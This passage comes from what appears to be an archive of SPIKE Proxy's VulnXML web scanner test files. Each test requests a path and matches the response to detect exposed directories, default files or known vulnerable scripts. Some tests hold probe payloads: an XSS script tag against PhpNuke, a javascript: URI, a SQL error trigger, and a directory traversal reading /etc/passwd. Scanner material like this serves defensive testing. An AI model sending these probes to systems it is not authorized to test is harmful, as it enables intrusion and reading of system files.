before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-518.xml0100664000076500007650000000703207566204543017564 0ustar davedave (tools/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /tools/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-519.xml0100664000076500007650000000704407566204543017570 0ustar davedave (trafficlog/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /trafficlog/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-51.xml0100664000076500007650000000726707566204543017506 0ustar davedave (index.html.ru.cp866) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ru.cp866 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-520.xml0100664000076500007650000000703007566204543017553 0ustar davedave (tree/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /tree/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-521.xml0100664000076500007650000000703607566204543017562 0ustar davedave (updates/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /updates/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-522.xml0100664000076500007650000000723707566204543017566 0ustar davedave (usage/) "Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /usage/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Generated by The Webalizer 200 Generated by The Webalizer 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-523.xml0100664000076500007650000000751107566204543017562 0ustar davedave (user.php?op=userinfo&uname=<script>alert('hi');</script>) "The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /user.php?op=userinfo&uname=<script>alert('hi');</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('hi'\);</script> 200 <script>alert\('hi'\);</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-524.xml0100664000076500007650000000703007566204543017557 0ustar davedave (user/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /user/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-525.xml0100664000076500007650000000717207566204543017567 0ustar davedave (usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)) GET 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ GET 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} GET spkproxy/VulnXML/SiteTests/sitetest-526.xml0100664000076500007650000000717307566204543017571 0ustar davedave (userinfo.php?uid=1;) "Xoops portal gives detailed error messages including SQL syntax and may allow an exploit." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /userinfo.php?uid=1; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Query 200 Query 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-527.xml0100664000076500007650000000710307566204543017563 0ustar davedave (userlog.php) "Teekai's Tracking Online 1.0 log can be retrieved remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /userlog.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-528.xml0100664000076500007650000000703207566204543017565 0ustar davedave (users/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /users/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-529.xml0100664000076500007650000000703407566204543017570 0ustar davedave (ustats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ustats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-52.xml0100664000076500007650000000727107566204543017502 0ustar davedave (index.html.ru.iso-ru) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ru.iso-ru HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-530.xml0100664000076500007650000000702607566204543017561 0ustar davedave (vfs/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /vfs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-531.xml0100664000076500007650000000735207566204543017564 0ustar davedave (viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1) "KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-532.xml0100664000076500007650000000723007566204543017560 0ustar davedave (view_source.jsp) "Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /view_source.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-533.xml0100664000076500007650000000704607566204543017566 0ustar davedave (w3perl/admin) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /w3perl/admin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-534.xml0100664000076500007650000000700607566204543017563 0ustar davedave (warez/) "Uh oh..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /warez/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-535.xml0100664000076500007650000000723307566204543017566 0ustar davedave (web/) "Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /web/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Generated by The Webalizer 200 Generated by The Webalizer 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-536.xml0100664000076500007650000000702607566204543017567 0ustar davedave (web/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /web/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-537.xml0100664000076500007650000000704007566204543017564 0ustar davedave (web800fo/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /web800fo/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-538.xml0100664000076500007650000000704707566204543017574 0ustar davedave (webaccess.htm) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webaccess.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-539.xml0100664000076500007650000000710107566204543017564 0ustar davedave (webaccess/access-options.txt) "Just found this file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webaccess/access-options.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-53.xml0100664000076500007650000000727107566204543017503 0ustar davedave (index.html.ru.koi8-r) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ru.koi8-r HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-540.xml0100664000076500007650000000706607566204543017566 0ustar davedave (webadmin/) "This might be interesting...may be HostingController 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webadmin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-541.xml0100664000076500007650000000724707566204543017570 0ustar davedave (webalizer/) "Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webalizer/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Generated by The Webalizer 200 Generated by The Webalizer 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-542.xml0100664000076500007650000000704007566204543017560 0ustar davedave (webboard/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webboard/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-543.xml0100664000076500007650000000705007566204543017562 0ustar davedave (webcart-lite/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart-lite/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-544.xml0100664000076500007650000000703607566204543017567 0ustar davedave (webcart/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-545.xml0100664000076500007650000000703607566204543017570 0ustar davedave (webdata/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webdata/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-546.xml0100664000076500007650000000703407566204543017567 0ustar davedave (weblog/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /weblog/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-547.xml0100664000076500007650000000710007566204543017562 0ustar davedave (weblogic) "Weblogic directory is available with indexing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /weblogic HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of 200 index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-548.xml0100664000076500007650000000703607566204543017573 0ustar davedave (weblogs/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /weblogs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-549.xml0100664000076500007650000000704307566204543017572 0ustar davedave (webmail/) "Web based mail package installed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webmail/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-54.xml0100664000076500007650000000726507566204543017507 0ustar davedave (index.html.ru.utf8) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ru.utf8 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-550.xml0100664000076500007650000000703607566204543017564 0ustar davedave (WebShop/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WebShop/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-551.xml0100664000076500007650000000703607566204543017565 0ustar davedave (website/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /website/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-552.xml0100664000076500007650000000704007566204543017561 0ustar davedave (webstats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webstats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly 